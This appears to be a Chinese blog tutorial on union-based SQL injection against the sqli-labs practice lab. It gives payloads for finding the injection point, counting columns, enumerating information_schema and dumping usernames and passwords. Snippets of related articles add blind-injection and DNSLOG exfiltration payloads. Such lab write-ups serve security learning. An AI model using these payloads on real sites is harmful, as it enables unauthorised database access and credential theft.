sql注入之回显注入

最新推荐文章于 2024-04-08 19:05:06 发布
最新推荐文章于 2024-04-08 19:05:06 发布
阅读量3.9k 收藏 16
点赞数 3
分类专栏: kali linux渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/maluxiao123/article/details/115066844
版权

之前已经简单介绍了sql注入的基本原理,接下来会按照sql注入的各种类型一一进行梳理,sql注入的常见主要分为回显注入、报错注入、bool盲注、延时注入、堆叠注入、二次注入、宽字节注入、http头注入、DNS LOAD注入。
回显注入需要依靠页面具有数据库查询出内容,使用注入来替换掉本身应该显示的内容来进行攻击的。比如在靶场sqli-labs的第二关中页面查询的内容是通过传入的id=2来控制的
在这里插入图片描述
当id=0时,数据库没有id=0的内容,所以就不返回任何数据
在这里插入图片描述

我们可以看他的后台查询语句
在这里插入图片描述
查询了users表中的所有内容,所以Angelina和L-kill-you是存储在数据库中的内容。以上是简单的分析。

1.接下来进行sql注入的第一步,进行注入点判断。
使用and 1=1和and1=2来判断
在这里插入图片描述
在这里插入图片描述
明显and语句执行了,导致整个sql语句为假,所以这里是一个数字型注入点,不需要进行闭合

2.第二步进行列数的判断,使用order by进行列数判断时,通常使用二分法来提高效率,比如100过大,就减半测试500。,结合页面判断列数不多,猜测4
在这里插入图片描述
4如果过大的话再猜测3,3回显正确
在这里插入图片描述
3.然后将id的值进行修改,修改为数据库中不存在的值,就会将回显的位置腾出来。
(1)联合查询进行回显位的判断
payload: id=0 union select 1,2,3 明显能看出2列和3列的位置有回显内容
在这里插入图片描述
(2)查库名
payload: id=0 union select 1,database(),3
在这里插入图片描述
(3)查表名
id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()
其中库information_schema是mysql中自带的一个库,包含其他库的大量信息,通过它来查询其他库的信息,在mysql5.0以上都有
(4)查列名,表名为users
id=0 union slect 1,group_concat(column_name),3 from information_schema.columns where table_name=“users”
(5)查内容,字段名为id,username,password,我们不需要id的内容
id=0 union select 1,group_concat(username),group_concat(password) from security.users
在这里插入图片描述
在内容如果过多可以在语句中加上limit进行限制来逐个输出

thesky0001
关注
  • 3
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入详解
m0_67392811的博客
06-12 5812
目录前言? ?一、漏洞原因分析二、漏洞危害三、sql注入防范四、如何挖掘sql注入漏洞五、常见的注入手法联合查询(union注入)报错注入基于布尔的盲注基于时间的盲注HTTP头注入宽字节注入堆叠查询二阶注入六、sql注入getshell的几种方式结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。SQL注入(SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没
SQL注入--union判断回显
最新发布
YYYYU_ZHIZZZ的博客
05-02 353
sql注入(sqli-labs)
SQL注入回显)-DVWA
xy_sugar的博客
01-23 2619
概述 LOW等级 1、首先尝试正常操作,输入1 可是这里web应用通过查询数据库,获取了id为1的用户的信息,猜测SQL语句为: 2、接下来检测是否存在SQL注入漏洞,输入1’   报错,则说明单引号注入到SQL语句中报错,存在SQL注入漏洞 尝试数字型,查询结果与id=1时的结果一样 尝试第二种情况,成功执行 尝试双引号,也没有成功 所以可知这里...
SQL注入--回显
qq_27339511的博客
04-10 355
回显注入练习:sqli-labs-Less-3和sqli-labs-Less-4。操作系统:@@version_compile_os。sqli-labs-Less-3闭合点为');sqli-labs-Less-3闭合点为");数据库名字:database()数据库版本:version()数据库用户:user()
SQL注入漏洞基础(三)
qq_59611876的博客
12-16 484
只要这个程序是人写的,那么一定会存在SQL注入的点。当Web应用向后台数据库传递SQL语句进行数据库操作时。如果对用户输入的参数没有经过严格的过滤处理,那么攻击者就可以构造特殊的SQL语句,直接输入数据库引擎执行,获取或修改数据库中的数据。
sql注入回显应用情况
weixin_74182283的博客
04-08 1053
load_file为攻击的相关函数,利用concat函数将查询的version与使用的域名包含起来,其中‘\\\\’为转义字符,可以理解为转义\,输出两个\\ ,而使用\的原因也是为了模仿UNC的路径,后面那个.xxx为域名解析,而那个test则是随便输的一个文件,可以是不存在的,只是为了让查询的数据回显到dnslog上。盲注速度很慢,有时候需要一个一个字符去进行爆破,可以但不够高效,并且有时候防火墙还回去禁用ip,此时就可以考虑通过DNSLOG来快速的得到数据。站库分离(这是个作业,老师给的压缩包。
6-30 无回显sql注入(盲注) 基于位置注入 sqlmap参数
weixin_44371476的博客
07-02 2201
基于时间的盲注 表名的字典 1%27%20and%20if(ascii(substr(database(),1,1))>0,sleep(2),1)%20–+ ?id=1’ and if(ascii(substr(database(),1,1))=0,sleep(2),1) --+ ?id=1’ and if(left(database(),1)=‘s’,sleep(2),1) --+ 基于布尔的盲注 ?id=-1%27%20or%20left(database(),1)=%27u%27%20...
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法...
基于错误回显SQL注入整理
12-14
 用我自己的话来讲,基于错误回显sql注入是通过sql语句的矛盾性来使数据被回显到页面上(当然在实际应用中得能回显在页面上,一般的网站都回避免这种情况,哈哈,要是能碰上你偷着乐吧)。  0x01 用于错误...
易语言SQL注入
07-20
在网络安全领域,SQL注入是一种常见的攻击手段,通过输入恶意的SQL语句来获取、修改、删除数据库中的数据,甚至控制整个数据库系统。下面将详细介绍易语言SQL注入的相关知识点。 1. **SQL注入原理**: SQL注入主要...
超级SQL注入工具【SSQLInjection】V1.0 正式版 20200527.rar
04-10
2. **多模式测试**:工具可能支持多种SQL注入技术,如时间基注入、盲注、错误回显等,以适应不同类型的防护策略。 3. **数据提取**:一旦找到注入点,工具可能能从中提取数据库中的记录,如用户信息、管理员凭证或...
sql注入的思维导图。
04-19
SQL注入可以通过回显和盲注来获取数据库信息: * 回显:通过查询结果来获取数据库信息。 * 盲注:通过延时或报错来判断数据库信息。 注入类型 SQL注入有多种类型,包括: * 数字型注入:不需要单引号闭合字符。 ...
Sql注入基础复习
qq_49283465的博客
10-14 224
注入类型为’时,所构造的sql语句为’2’ and ‘1’=‘1’,返回的值为’2’,所以所查询的结果为id=2。注入类型为’)时,所构造的sql语句为(‘2’ and ‘1’=‘1’),这时会把括号内的值当做布尔值处理。2’ and ‘1’=‘1,若返回结果为id=2时的值,则说明注入类型为’,若返回结果为id=1时的值,说明注入类型为’)闭合方式’ " () (‘x’) ((‘x’)) (“x”) ((“x”)) (()) ‘%x%’-------
DVWA之SQL注入
m0_67392182的博客
09-11 775
深知大多数初中级Java工程师,想要提升技能,往往是自己摸索成长或者是报班学习,但对于培训机构动则近万的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《Java开发全套学习资料》送给大家,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。
DVWA学习日记-6 SQL回显注入
qq_29010757的博客
11-24 833
SQL回显注入 概述 命令注入漏洞和sql注入漏洞都是用把注入的数据当做代码来执行,区别在于命令注入漏洞注入的是系统命令,sql注入的是sql语句 sql语句就是操作数据库的语句,就是通过WEB操作在数据库执行任意SQL语句,所谓的sql注入漏洞是非常普遍的安全漏洞,本笔记是sql回显注入,就是会把sql注入数据库执行结果显示在页面上 准备 Firefox DVWA Hackbar Firebug...
SQL注入-有回显注入
渗透笔记
01-12 6501
1.MySQL相关 在MySQL 5+版本后,加入了information_schema这个库,该库存放了所有数据库的信息 information_schema.columns包含所有表的字段 字段 table_schema 数据库名 table_name 表名 column_name
SQL注入实战————1、MySQL手工注入实战
热门推荐
Fly_鹏程万里
05-06 1万+
无意中发现了一个巨牛巨牛的人工智能教程,忍不住分享一下给大家。教程不仅是零基础,通俗易懂,小白也能学,而且非常风趣幽默,还时不时有内涵段子,像看小说一样,哈哈~我正在学习中,觉得太牛了,所以分享给大家。点这里可以跳转到教程! SQL注入实战 靶场地址:http://219.153.49.228:48204/show.php?id=MQ== 首先可以看到该URL中存在一个参数“MQ==”,从参...
SQL注入篇——dns回显注入
爱国小白帽
02-10 1971
dns回显注入的使用场景 当目标无显示位也无错误回显时便可使用此方法 1、首先使用网站http://www.dnslog.cn/点击此处获取dns地址 2、将获取到的地址复制填入SQL语句中执行 注意:每次获取到的dns地址都不同,改变时替换注入语句中标红部分即可 注入语句: id=1’ and load_file(concat("\\",(database()),".2bmfvu.dnslo...
sql注入如何判断回显
04-26
SQL注入是一种常见的安全漏洞,攻击者通过在用户输入的数据中插入恶意的SQL代码,从而可以执行未经授权的数据库操作。判断SQL注入回显位的方法主要有以下几种: 1. 错误消息:当注入的SQL语句存在错误时,数据库可能会返回相应的错误消息。攻击者可以通过观察错误消息来判断是否存在注入漏洞。 2. 布尔盲注:攻击者可以通过构造特定的SQL语句,利用数据库的布尔逻辑判断来判断回显位。例如,通过构造一个条件语句,根据返回结果的真假来判断是否存在注入漏洞。 3. 时间盲注:类似于布尔盲注,但是攻击者通过构造特定的SQL语句,利用数据库的时间函数来判断回显位。例如,通过构造一个延时操作,根据返回结果的延时时间来判断是否存在注入漏洞。 4. UNION注入:攻击者可以通过在注入点使用UNION语句,将恶意查询的结果合并到正常查询结果中。如果回显位发生了变化,说明注入成功。 5. 报错注入:攻击者可以通过在注入点使用SELECT、INSERT等语句,并故意构造错误来触发数据库报错。观察报错信息可以判断是否存在注入漏洞。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值